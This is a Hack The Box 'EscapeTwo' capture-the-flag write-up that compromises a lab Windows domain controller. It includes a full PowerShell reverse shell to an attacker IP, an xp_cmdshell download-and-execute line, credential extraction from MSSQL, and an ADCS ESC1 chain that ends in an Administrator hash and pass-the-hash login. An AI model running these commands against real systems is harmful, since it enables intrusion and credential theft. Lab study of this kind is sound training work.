HacktheBox-EscapeTwo

Preface

Season 7 has started. This box comes with a set of starting credentials: rose / KxEPkKe6R8su

This box got solved by an unintended xp_cmdshell path early on, and it took quite a while before I found a writeup that did it the proper way, so I am studying that one here.

I don't get why this is rated Easy; it feels about as hard as the earlier Infiltrator.

Reconnaissance

nmap -sV -sC -O 10.10.11.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 23:26 CST
Nmap scan report for 10.10.11.51
Host is up (0.16s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-22 15:10:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-22T15:12:00+00:00; -16m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-22T15:11:59+00:00; -16m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-22T15:12:00+00:00; -16m00s from scanner time.
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-22T15:00:05
|_Not valid after: 2055-01-22T15:00:05
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-22T15:12:00+00:00; -16m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-22T15:11:59+00:00; -16m00s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-01-22T15:11:20
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -16m00s, deviation: 0s, median: -16m00s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.62 seconds

SMB

Enumerate and access the SMB service with the supplied credentials.

crackmapexec smb 10.10.11.51 -u rose -p KxEPkKe6R8su --users
SMB 10.10.11.51 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.10.11.51 445 DC01 [+] Enumerated domain user(s)
SMB 10.10.11.51 445 DC01 sequel.htb\ca_svc badpwdcount: 0 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\rose badpwdcount: 0 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\sql_svc badpwdcount: 0 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\oscar badpwdcount: 2 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\ryan badpwdcount: 0 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\michael badpwdcount: 1 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\krbtgt badpwdcount: 1 desc: Key Distribution Center Service Account
SMB 10.10.11.51 445 DC01 sequel.htb\Guest badpwdcount: 1 desc: Built-in account for guest access to the computer/domain
SMB 10.10.11.51 445 DC01 sequel.htb\Administrator badpwdcount: 0 desc: Built-in account for administering the computer/domain

Connect with smbclient

smbclient -L 10.10.11.51 -U rose

Connect to the separate Accounting Department share with the credentials

smbclient '//10.10.11.51/Accounting Department' -U rose

Download the files with the get command:

get accounting_2024.xlsx
get accounts.xlsx

Build user and password lists, then password-spray:

crackmapexec smb 10.10.11.51 -u users.txt -p passwords.txt

sequel.htb\Oscar:86LxLBMgEWaKUnBG shows up as valid, but that account cannot be used to log in and go any further.

The MSSQL service can also be logged into.

Seeing mssql immediately brought xp_cmdshell to mind, but I had never actually used it before.

A good chance to learn it here. Since the target is a Windows machine, prepare a PowerShell script to use as a reverse shell.

$LHOST = "10.10.16.59"; $LPORT = 7777; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

Serve the script over HTTP, then connect to the MSSQL service with mssqlclient.

mssqlclient.py sequel.htb/sa:'MSSQLP@ssw0rd!'@10.10.11.51

Run the command:

EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.59/shell.ps1") | powershell -noprofile'

However, xp_cmdshell does not appear to be enabled here:

Later I found that others used this tool: netexec

GitHub - Pennyw0rth/NetExec: The Network Execution Tool

First check the privileges:

./nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth --list

Try to escalate, but it already appears to be high-privileged.

./nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth --module mssql_priv

netexec can execute commands directly with -x

./nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x 'whoami'

The privilege level is sequel\sql_svc

Check which users exist and whether user.txt can be read directly:

No permission; it cannot be read directly.

This part is clever: through mssql you can read this user's account and password:

# Check the version number
./nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -q 'SELECT @@version'
# Read the configuration file
./nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x 'type C:\SQL2019\ExpressAdv_enu\sql-Configuration.INI'

SEQUEL\sql_svc:WqSZAF6CysDQbGb3

But this account cannot log in via WinRM. The same password does, however, work for ryan.

Then log in directly via winrm:

evil-winrm -i 10.10.11.51 -u ryan -p WqSZAF6CysDQbGb3

Administrator

Use bloodhound to collect information; it gathers everything it needs and saves it as JSON. Then start the database and open the GUI to analyze.

bloodhound-python -u 'ryan' -p 'WqSZAF6CysDQbGb3' -d sequel.htb -ns 10.10.11.51 -c All

Run neo4j start to bring up the database, then open the GUI and import the JSON.

Search for the ryan node in the top-left, then look at the path under Outbound Object Control -> Transitive Object Control:

ryan has rights over CA_SVC, and the latter has rights to manage certificates.

RedTeaming_CheatSheet/windows-ad/Domain-Privilege-Escalation.md at main · 0xJs/RedTeaming_CheatSheet

Grant rights | The Hacker Recipes

Abusing Active Directory Certificate Services - Part One - Black Hills Information Security

Now we come to my favourite part: the part I don't understand. This privilege escalation really is a bit abstract.

A certificate template with the ESC1 vulnerability allows low privileged users to enroll and request a certificate on behalf of any domain object specified by the user. This means that any user with enrollment rights can request a certificate for a privileged account such as a domain administrator.
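As an added example (not from the post or the box), a small Python audit that encodes the four ESC1 preconditions the quote describes and evaluates constructed template attributes; the AD attribute names and flag bits are the real ones, while `enroll` is a simplification standing in for the enrollment ACEs of the template's DACL.

```python
# Added example (not from the post): flag certificate templates that meet the
# ESC1 preconditions quoted above. Sample templates below are constructed.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # bit in msPKI-Enrollment-Flag
# EKU OIDs that make the issued certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Enrollment by any of these counts as "low-privileged users can enroll".
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


def esc1_conditions(tpl):
    """Return the ESC1 preconditions a template meets; all four together = ESC1.
    tpl["enroll"] is a simplification: the principals holding the
    Certificate-Enrollment right, which really comes from the template's DACL."""
    met = []
    if tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        met.append("requester supplies the subject/SAN")
    ekus = set(tpl["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:  # an empty EKU list allows any purpose
        met.append("certificate is valid for authentication")
    if not (tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS) \
            and tpl["msPKI-RA-Signature"] == 0:
        met.append("no manager approval or authorized signature required")
    if set(tpl["enroll"]) & LOW_PRIV:
        met.append("low-privileged principals can enroll")
    return met


def is_esc1(tpl):
    return len(esc1_conditions(tpl)) == 4


# Constructed: one template modelled on the ESC1 conditions (not read from the
# box), and a hardened counterpart (subject built from AD, approval, admins only).
VULNERABLE = {
    "name": "ExampleAuthTemplate",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enroll": ["Domain Users"],
}
HARDENED = {**VULNERABLE, "msPKI-Certificate-Name-Flag": 0,
            "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
            "enroll": ["Domain Admins"]}
```

Fixing any single one of the four conditions (subject from AD, manager approval, a non-authentication EKU, or restricted enrollment) is enough to take a template out of ESC1.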

We have WriteOwner over ca_svc, so it can be taken over with BloodyAD (after the takeover, Ryan gains the right to modify the account):

bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 set owner CA_SVC ryan

Then modify the DACL of CA_SVC (a DACL is a specific type of ACL used to manage object access in Windows. It is part of an object's security descriptor and defines which users or groups hold which access rights on the object. Each ACE (access control entry) in the DACL specifies the rights of a particular user or group.)

impacket-dacledit  -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"
[*] DACL backed up to dacledit-20250119-224357.bak
[*] DACL modified successfully!
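An added Python model (not from the post) of the security-descriptor rules that make the WriteOwner edge above dangerous: the owner of an object always gets WRITE_DAC, so "set owner" followed by a FullControl ACE yields GenericAll. The access-mask bits are the real Windows values; the ca_svc object is constructed.

```python
# Added example (not from the post): a minimal model of a Windows security
# descriptor showing why WriteOwner on an account is as good as full control.
from dataclasses import dataclass, field

READ_CONTROL = 0x00020000
WRITE_DAC = 0x00040000    # may rewrite the DACL
WRITE_OWNER = 0x00080000  # may change the owner
GENERIC_ALL = 0x10000000  # what dacledit calls FullControl

@dataclass
class Ace:
    allow: bool    # True = access-allowed ACE, False = access-denied ACE
    trustee: str   # principal the ACE applies to
    mask: int      # access-mask bits granted or denied

@dataclass
class SecurityDescriptor:
    owner: str
    dacl: list = field(default_factory=list)

def effective_rights(sd, principal, groups=()):
    """Access mask `principal` ends up with: denies win over allows, and the
    owner implicitly holds READ_CONTROL and WRITE_DAC whatever the DACL says."""
    ids = {principal, *groups}
    allowed = denied = 0
    for ace in sd.dacl:
        if ace.trustee in ids:
            if ace.allow:
                allowed |= ace.mask
            else:
                denied |= ace.mask
    rights = allowed & ~denied
    if sd.owner == principal:
        rights |= READ_CONTROL | WRITE_DAC
    return rights

def takeover_steps(sd, principal, groups=()):
    """Replay the chain above (set owner, then grant FullControl) on the model
    and return the steps that applied; [] means neither WriteOwner nor WriteDacl."""
    steps = []
    if effective_rights(sd, principal, groups) & WRITE_OWNER and sd.owner != principal:
        sd.owner = principal                               # bloodyAD set owner
        steps.append("set owner")
    if effective_rights(sd, principal, groups) & WRITE_DAC:
        sd.dacl.append(Ace(True, principal, GENERIC_ALL))  # dacledit FullControl
        steps.append("grant FullControl ACE")
    return steps

# Constructed: ryan holds only WriteOwner on ca_svc, as the BloodHound edge showed.
ca_svc_sd = SecurityDescriptor(owner="Domain Admins", dacl=[Ace(True, "ryan", WRITE_OWNER)])
```

When auditing ACLs, WriteOwner and WriteDacl on a privileged account should therefore be triaged exactly like GenericAll.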

Er, this one did not run successfully for me, so my chain broke here; I will attach his approach. certipy-ad generates new key credentials (shadow credentials) so that certificate-based authentication is enabled, and the saved ccache file can be used for Kerberos attacks.

certipy-ad shadow auto -u 'ryan@sequel.htb' -p "WqSZAF6CysDQbGb3" -account 'ca_svc' -dc-ip '10.10.11.51' -target dc01.sequel.htb -ns 10.10.11.51

Modify the certificate template so that it can be used to escalate privileges, i.e. it allows certificates to be issued with elevated rights.

KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template  -k -template DunderMifflinAuthentication  -target dc01.sequel.htb -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'

Request a certificate with the UPN (User Principal Name) Administrator@sequel.htb, thereby obtaining the Administrator account.

certipy-ad req -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target dc01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\('
"(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 58
[*] Got certificate with multiple identifications
UPN: 'Administrator@sequel.htb'
DNS Host Name: '10.10.11.51'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_10.pfx'

Authenticate with the certificate as Administrator and retrieve the NTLM hash

certipy-ad auth -pfx administrator_10.pfx -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'Administrator@sequel.htb'
[1] DNS Host Name: '10.10.11.51'
> 0
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

Then the shell:

evil-winrm -i 10.10.11.51 -u administrator -H "7a8d4e04986afa8ed4060f75e5a0b3ff"

Summary

When you come across mssql, use netexec to test whether -x gives direct RCE.

Some mssql versions expose local account credentials.

Use of bloodyAD

Ref